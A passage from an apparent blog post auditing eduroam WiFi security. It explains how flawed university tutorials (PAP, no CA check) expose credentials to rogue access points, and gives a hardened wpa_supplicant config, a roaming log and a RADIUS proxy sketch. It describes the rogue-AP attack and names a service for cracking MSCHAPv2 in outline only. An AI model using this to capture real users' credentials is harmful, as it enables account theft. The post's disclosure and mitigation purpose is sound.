The next problem is that a lot of universities (like mine) provide flawed tutorials for configuring WiFi clients for eduroam. Even when MSCHAPv2 is available, the tutorials often use PAP to authenticate the client. PAP sends all user credentials in plaintext, whereas MSCHAPv2 provides a challenge-response procedure. Furthermore, a lot of tutorials do not set up the CA to check the server certificate. Without this setting the client connects to any eduroam access point without checking the validity of the server certificate.
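For wpa_supplicant, a configuration that avoids both tutorial mistakes could look like the following sketch (identity, password, file paths and the pinned name are placeholders; subject_match performs a substring match on the server certificate's subject, which mitigates but does not fully replace a real server address check):

```conf
# Sketch of a hardened wpa_supplicant network block for eduroam.
# All values are placeholders for illustration.
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=TTLS
    phase2="auth=MSCHAPV2"      # never PAP: PAP sends the password in plaintext
    identity="user@ruhr-uni-bochum.de"
    password="changeme"
    # Without ca_cert the client accepts ANY server certificate:
    ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem"
    # Pin the expected radius server name in the certificate subject:
    subject_match="radius.ruhr-uni-bochum.de"
}
```

Note that even with ca_cert set, any certificate under the whole CA chain is accepted unless the subject is pinned as well, which is exactly the design flaw described above.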
This means that when a user has configured her client with the help of these flawed tutorials and uses eduroam, she might just as well shout out her credentials every time she connects to the WiFi network. The really bad thing about this is that when an adversary gets someone's user credentials, he often has the user credentials for other services of the university as well, because the same account is used (in the case of my university: for the email account, the MSDNAA account, ...). I heard of some universities that even use these credentials to let students register for or withdraw from exams of the offered courses. The only way a client can protect herself against this attack is by using MSCHAPv2. When MSCHAPv2 is used, the adversary still has to brute force the password after he has successfully forged an eduroam access point. This means the security comes from the strength of her password (and the strength of MSCHAPv2 ... which uses DES and can be cracked relatively fast with services like https://www.cloudcracker.com/ :/ ).

In my opinion, the only way to really fix this issue is to use a dedicated public key infrastructure for the whole eduroam WiFi design. If a dedicated CA were used for eduroam (perhaps with intermediate CAs for the universities, to be used only for certificates that belong to the eduroam infrastructure), there would be no way for an attacker to forge a valid eduroam access point, because he could not get a signed certificate for it. If the clients set up this CA in their eduroam settings, they would not connect to rogue access points. Even if a client were configured to use PAP instead of MSCHAPv2, the user credentials would still be protected to some degree. But such a dedicated public key infrastructure only works when the clients are configured correctly, and this means that the universities have to fix their eduroam tutorials first. I wrote to my university about this issue and they fixed some tutorials (for example the one for Android).
But not all of them are fixed (for example the one for wpa_supplicant) and I do not think that they will fix all of them. And even so, fixing the tutorials will not help where students and university staff have already applied the flawed configurations.

Errata

At the time of writing this article, I had not tested this statement; I just based it on the settings you can make in an access point, a statement of my university and a statement a friend of mine had made. However, yesterday night I drove to the next city to test it at another university (the TU Dortmund). Honestly, I did not expect this result:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with 00:14:a8:14:86:f1
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de'
EAP-TTLS: Phase 2 MSCHAPV2 authentication succeeded

The wpa_supplicant output shows that even when I am at another university in Germany and use eduroam there, the CA chain looks the same as at my university. This means that my WiFi client still connects to the radius server of my home university. I did not expect that (and do not really know how this infrastructure works exactly). Unfortunately, I have no way to test this with a university in a foreign country.
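This behaviour is consistent with eduroam's hierarchical RADIUS proxying: the visited institution forwards authentication requests based on the realm behind the "@" in the username to national federation servers, which route them to the user's home institution, so the TLS tunnel really terminates at the home radius server. A hedged FreeRADIUS-style sketch of what the visited site's proxy configuration could look like (all host names and secrets are invented, this is not eduroam's actual configuration):

```conf
# Hypothetical proxy.conf fragment at a visited institution.
# Local users are authenticated locally; every other realm is forwarded
# to a national federation proxy, which routes it onward to the user's
# home radius server (e.g. radius.ruhr-uni-bochum.de).

home_server federation_proxy {
    type   = auth
    ipaddr = federation.example.org     # invented name
    port   = 1812
    secret = example-shared-secret
}

home_server_pool federation_pool {
    type        = fail-over
    home_server = federation_proxy
}

realm tu-dortmund.de {
    # local realm, handled by this server
}

realm DEFAULT {
    auth_pool = federation_pool         # everything else goes upstream
    nostrip
}
```

This would explain why the observed certificate chain is always the home university's, regardless of where the client roams.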
Nevertheless, my conclusion that a dedicated CA should have been used for the eduroam infrastructure remains the same.

Source: eduroam WiFi security audit or why it is broken by design - sqall's blog